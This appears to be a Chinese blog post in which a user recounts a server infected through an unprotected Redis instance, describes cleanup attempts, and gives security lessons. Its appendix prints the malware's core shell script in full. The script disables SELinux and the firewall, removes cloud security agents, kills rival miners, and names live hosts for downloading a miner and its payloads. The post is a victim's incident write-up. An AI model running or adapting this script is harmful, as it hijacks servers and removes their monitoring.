一次惨痛的教训:被pnscan病毒攻击的经过
本文共 38052 字,大约阅读时间需要 126 分钟。
文章目录
0.案发情况
pnscan病毒感染惨状:
- 使用top & ps & netstat 等等命令,都无法正常使用
- CPU基本100%,时不时网络中断
- redis端口6379被大规则线程占用
- 通过lsof -i:6379 查看进程,发现进程id一直在变动
- rm -rf 攻击的脚本,显示没权限(加sudo也没用,彻底对这个病毒服气了!)
>>提示<<
- 最终因为被感染的文件实在太多,只能重装系统。尽管删除了核心的攻击脚本,但是我自己的很多脚本命令也被破坏了。
- 如果整个排查过程对你有帮助,请继续看,如果你想彻底解决掉,可以关闭此页面了(我也没找到彻底解决的方案!)
1.案发原因
- 起初redis设置了非默认的端口号,也设置了密码,用起来看似平静。
- 后来,把密码去掉了,端口号改为默认6379了。结果、结果就…
2.排查过程
简单排查之后,发现啥都做不了。先百度到了如下文章:
1.痛点一:多个攻击的脚本导致CPU完全被占用
在etc目录下,发现了几个可疑的文件,主要的是这三个:
newinit.sh newsvc.sh newdat.sh这些脚本直接rm无法清除掉,因为这些文件都包含了i属性,使用指令lsattr 文件名可查看文件属性.
lsattr newinit.sh## ----ia----------- newinit.sh# 知道原因后就好办了,执行指令chattr -i 文件名,更改文件i属性,如下chattr -i newinit.shrm -rf newinit.sh
- 利用如上的脚本,可以直接删除掉主要的攻击脚本。此时,CPU的使用就正常了。
- 但是,你删除的仅仅是其中一个,还有很多隐藏的内容。在核心攻击脚本里面搜索:chattr -ia ,会发现修改了很多文件。
2.痛点二:top、ps、crontab等多个脚本文件被串改
top命令使用情况
top命令源文件的内容直接被改为如下内容 
因为很多文件都被串改了,内容都大同小异,导致原始的命令无法使用,恢复起来工作量也很大!
如下是被串改文件的部分截图:
3.痛点三:crontab 定时任务脚本被感染
虽然newinit.sh脚本被删除了,但是定时任务crontab -e ,一直无法删除这项定时任务。
后来找到crontab的源文件,发现删除5个文件之后,又重新冒出来一个新的源文件,根本删除不了这个定时任务。不知道啥时候,这个毒瘤会卷土重来!
大致找到了相关的原理脚本,我对shell不熟悉,懂的人可以详细研究下
3.总结:
- 如果想彻底解决这个毒瘤,需要恢复的内容很多、且需要完全把攻击的脚本看懂,否者也不能彻底恢复
- 想想本人能力还有限 ,有这个时间,不如重新安装一个系统。
- 此服务器个人学习使用,安全问题自己关注的很少。至少任何服务开启的时候,以后都要设置密码!!
- 如果可以,防火墙设置固定的IP地址访问的权限、常用的端口,如80/3306/6379等等,可以设置其他非默认端口。
- 有时间大致研究下附录脚本,发现自己与大神的距离有多远,不学习只能被虐了!学习动力瞬间up,up,up
4.附录:核心攻击脚本
#!/bin/shsetenforce 0 2>dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullsync && echo 3 >/proc/sys/vm/drop_cachescrondir='/var/spool/cron/'"$USER"cont=`cat ${ crondir}`ssht=`cat /root/.ssh/authorized_keys`echo 1 > /etc/zzhsrtdir="/etc/zzhs"bbdir="/usr/bin/curl"bbdira="/usr/bin/cd1"ccdir="/usr/bin/wget"ccdira="/usr/bin/wd1"mv /usr/bin/curl /usr/bin/urlmv /usr/bin/url /usr/bin/cd1mv /usr/bin/wget /usr/bin/getmv /usr/bin/get /usr/bin/wd1ulimit -n 65535rm -rf /var/log/syslogchattr -iua /tmp/chattr -iua /var/tmp/ufw disableiptables -F#sudo sysctl kernel.nmi_watchdog=0echo '0' >/proc/sys/kernel/nmi_watchdogecho 'kernel.nmi_watchdog=0' >>/etc/sysctl.confuserdel akayuserdel vfinderrm -rf /tmp/addres*rm -rf /tmp/walle*rm -rf /tmp/keysif ps aux | grep -i '[a]liyun'; then $bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash $bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -yelif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.shfiminer_url="http://199.19.226.117/b2f628/zzh"miner_url_backup="http://106.15.74.113/b2f628/zzh"miner_size="7600464"sh_url="http://199.19.226.117/b2f628/newinit.sh"sh_url_backup="http://106.15.74.113/b2f628/newinit.sh"config_url="http://199.19.226.117/b2f628/config.json"config_url_backup="http://106.15.74.113/b2f628/config.json"config_size="2732"chattr_size="8000"rm -f /tmp/.null 2>/dev/nullecho 128 > /proc/sys/vm/nr_hugepagessysctl -w vm.nr_hugepages=128kill_miner_proc(){ netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kworker -c\' | awk '{ print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'svc' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %#ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi | awk '$3>80.0{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %pgrep -f xzpauectgr | xargs -I % kill -9 %pgrep -f slxfbkmxtd | xargs -I % kill -9 %pgrep -f mixtape | xargs -I % kill -9 %pgrep -f addnj | xargs -I % kill -9 %pgrep -f 200.68.17.196 | xargs -I % kill -9 %pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %pgrep -f honvbsasbf.conf | xargs -I % kill -9 %pgrep -f mqdsflm.cf | xargs -I % kill -9 %pgrep -f lower.sh | xargs -I % kill -9 %pgrep -f ./ppp | xargs -I % kill -9 %pgrep -f cryptonight | xargs -I % kill -9 %pgrep -f ./seervceaess | xargs -I % kill -9 %pgrep -f ./servceaess | xargs -I % kill -9 %pgrep -f ./servceas | xargs -I % kill -9 %pgrep -f ./servcesa | xargs -I % kill -9 %pgrep -f ./vsp | xargs -I % kill -9 %pgrep -f ./jvs | xargs -I % kill -9 %pgrep -f ./pvv | xargs -I % kill -9 %pgrep -f ./vpp | xargs -I % kill -9 %pgrep -f ./pces | xargs -I % kill -9 %pgrep -f ./rspce | xargs -I % kill -9 %pgrep -f ./haveged | xargs -I % kill -9 %pgrep -f ./jiba | xargs -I % kill -9 %pgrep -f ./watchbog | xargs -I % kill -9 %pgrep -f ./A7mA5gb | xargs -I % kill -9 %pgrep -f kacpi_svc | xargs -I % kill -9 %pgrep -f kswap_svc | xargs -I % kill -9 %pgrep -f kauditd_svc | xargs -I % kill -9 %pgrep -f kpsmoused_svc | xargs -I % kill -9 %pgrep -f kseriod_svc | xargs -I % kill -9 %pgrep -f kthreadd_svc | xargs -I % kill -9 %pgrep -f ksoftirqd_svc | xargs -I % kill -9 %pgrep -f kintegrityd_svc | xargs -I % kill -9 %pgrep -f jawa | xargs -I % kill -9 %pgrep -f oracle.jpg | xargs -I % kill -9 %pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %pgrep -f 188.209.49.54 | xargs -I % kill -9 %pgrep -f 181.214.87.241 | xargs -I % kill -9 %pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %pgrep -f servim | xargs -I % kill -9 %pgrep -f kblockd_svc | xargs -I % kill -9 %pgrep -f native_svc | xargs -I % kill -9 %pgrep -f ynn | xargs -I % kill -9 %pgrep -f 65ccEJ7 | xargs -I % kill -9 %pgrep -f jmxx | xargs -I % kill -9 %pgrep -f 2Ne80nA | xargs -I % kill -9 %pgrep -f sysstats | xargs -I % kill -9 %pgrep -f systemxlv | xargs -I % kill -9 %pgrep -f watchbog | xargs -I % kill -9 %pgrep -f OIcJi1m | xargs -I % kill -9 %pkill -f biosetjenkinspkill -f Loopbackpkill -f apacehapkill -f cryptonightpkill -f mixnerdxpkill -f performedlpkill -f JnKihGjnpkill -f irqba2anc1pkill -f irqba5xnc1pkill -f irqbnc1pkill -f ir29xc1pkill -f connspkill -f irqbalancepkill -f crypto-poolpkill -f XJnRjpkill -f mgwslpkill -f pythnopkill -f jweripkill -f lx26pkill -f NXLAipkill -f BI5zjpkill -f askdljlqwpkill -f minerdpkill -f minergatepkill -f Guard.shpkill -f ysaydhpkill -f bonnspkill -f donnspkill -f kxjdpkill -f Duck.shpkill -f bonn.shpkill -f conn.shpkill -f kworker34pkill -f kw.shpkill -f pro.shpkill -f polkitdpkill -f acpidpkill -f icb5opkill -f nopxipkill -f irqbalanc1pkill -f minerdpkill -f i586pkill -f gddrpkill -f mstxmrpkill -f ddg.2011pkill -f wnTKYgpkill -f deamonpkill -f disk_geniuspkill -f sourplumpkill -f polkitdpkill -f nanoWatchpkill -f zigwpkill -f devtoolpkill -f devtoolspkill -f systemctIpkill -f watchbogpkill -f cryptonightpkill -f sustespkill -f xmrigpkill -f xmrig-cpupkill -f 121.42.151.137pkill -f init12.cfgpkill -f nginxkpkill -f tmp/wc.confpkill -f xmrig-notlspkill -f xmr-stakpkill -f suppoiepkill -f zer0day.rupkill -f dbus-daemon--systempkill -f nullcrewpkill -f systemctIpkill -f kworkerdspkill -f init10.cfgpkill -f /wl.confpkill -f crond64pkill -f sustsepkill -f vmlinuzpkill -f exinpkill -f apachiiipkill -f svcworkmanagerpkill -f xrpkill -f tracepkill -f svcupdatepkill -f networkmanagerpkill -f phpupdaterm -rf /usr/bin/config.jsonrm -rf /usr/bin/exinrm -rf /tmp/wc.confrm -rf /tmp/log_rotrm -rf /tmp/apachiiirm -rf /tmp/sustserm -rf /tmp/phprm -rf /tmp/p2.confrm -rf /tmp/pprtrm -rf /tmp/ppolrm -rf /tmp/javax/config.shrm -rf /tmp/javax/sshd2rm -rf /tmp/.profilerm -rf /tmp/1.sorm -rf /tmp/kworkerdsrm -rf /tmp/kworkerds3rm -rf /tmp/kworkerdssxrm -rf /tmp/xd.jsonrm -rf /tmp/syslogdrm -rf /tmp/syslogdbrm -rf /tmp/65ccEJ7rm -rf /tmp/jmxxrm -rf /tmp/2Ne80nArm -rf /tmp/dlrm -rf /tmp/ddgrm -rf /tmp/systemxlvrm -rf /tmp/systemctIrm -rf /tmp/.abcrm -rf /tmp/osw.hbrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/.javarm -rf /tmp/.omedrm -rf /tmp/.tmpcrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/gates.lodrm -rf /tmp/conf.nrm -rf /tmp/devtoolrm -rf /tmp/devtoolsrm -rf /tmp/fsrm -rf /tmp/.rodrm -rf /tmp/.rod.tgzrm -rf /tmp/.rod.tgz.1rm -rf /tmp/.rod.tgz.2rm -rf /tmp/.merrm -rf /tmp/.mer.tgzrm -rf /tmp/.mer.tgz.1rm -rf /tmp/.hodrm -rf /tmp/.hod.tgzrm -rf /tmp/.hod.tgz.1rm -rf /tmp/84Onmcerm -rf /tmp/C4iLM4Lrm -rf /tmp/lilpiprm -rf /tmp/3lmigMorm -rf /tmp/am8jmBPrm -rf /tmp/tmp.txtrm -rf /tmp/babyrm -rf /tmp/.librm -rf /tmp/systemdrm -rf /tmp/lib.tar.gzrm -rf /tmp/babyrm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.mynews1234rm -rf /tmp/a3e12drm -rf /tmp/.ptrm -rf /tmp/.pt.tgzrm -rf /tmp/.pt.tgz.1rm -rf /tmp/gorm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.tmpnewasssrm -rf /tmp/javarm -rf /tmp/go.shrm -rf /tmp/go2.shrm -rf /tmp/khugepagedsrm -rf /tmp/.censusqqqqqqqqqrm -rf /tmp/.kerberodsrm -rf /tmp/kerberodsrm -rf /tmp/seasamerm -rf /tmp/touchrm -rf /tmp/.prm -rf /tmp/runtime2.shrm -rf /tmp/runtime.shrm -rf /dev/shm/z3.shrm -rf /dev/shm/z2.shrm -rf /dev/shm/.scrrm -rf /dev/shm/.kerberodsrm -f /etc/ld.so.preloadrm -f /usr/local/lib/libioset.sochattr -i /etc/ld.so.preloadrm -f /etc/ld.so.preloadrm -f /usr/local/lib/libioset.sorm -rf /tmp/watchdogsrm -rf /etc/cron.d/tomcatrm -rf /etc/rc.d/init.d/watchdogsrm -rf /usr/sbin/watchdogsrm -f /tmp/kthrotldsrm -f /etc/rc.d/init.d/kthrotldsrm -rf /tmp/.sysbabyuuuuu12rm -rf /tmp/logo9.jpgrm -rf /tmp/miner.shrm -rf /tmp/nullcrewrm -rf /tmp/procrm -rf /tmp/2.shrm /opt/atlassian/confluence/bin/1.shrm /opt/atlassian/confluence/bin/1.sh.1rm /opt/atlassian/confluence/bin/1.sh.2rm /opt/atlassian/confluence/bin/1.sh.3rm /opt/atlassian/confluence/bin/3.shrm /opt/atlassian/confluence/bin/3.sh.1rm /opt/atlassian/confluence/bin/3.sh.2rm /opt/atlassian/confluence/bin/3.sh.3rm -rf /var/tmp/f41rm -rf /var/tmp/2.shrm -rf /var/tmp/config.jsonrm -rf /var/tmp/xmrigrm -rf /var/tmp/1.sorm -rf /var/tmp/kworkerds3rm -rf /var/tmp/kworkerdssxrm -rf /var/tmp/kworkerdsrm -rf /var/tmp/wc.confrm -rf /var/tmp/nadezhda.rm -rf /var/tmp/nadezhda.armrm -rf /var/tmp/nadezhda.arm.1rm -rf /var/tmp/nadezhda.arm.2rm -rf /var/tmp/nadezhda.x86_64rm -rf /var/tmp/nadezhda.x86_64.1rm -rf /var/tmp/nadezhda.x86_64.2rm -rf /var/tmp/sustse3rm -rf /var/tmp/sustserm -rf /var/tmp/moneroocean/rm -rf /var/tmp/devtoolrm -rf /var/tmp/devtoolsrm -rf /var/tmp/play.shrm -rf /var/tmp/systemctIrm -rf /var/tmp/.javarm -rf /var/tmp/1.shrm -rf /var/tmp/conf.nrm -r /var/tmp/librm -r /var/tmp/.libchattr -iau /tmp/lokchmod +700 /tmp/lokrm -rf /tmp/loksleep 1chattr -i /tmp/kdevtmpfsiecho 1 > /tmp/kdevtmpfsichattr +i /tmp/kdevtmpfsisleep 1chattr -i /tmp/redis2echo 1 > /tmp/redis2chattr +i /tmp/redis2chattr -ia 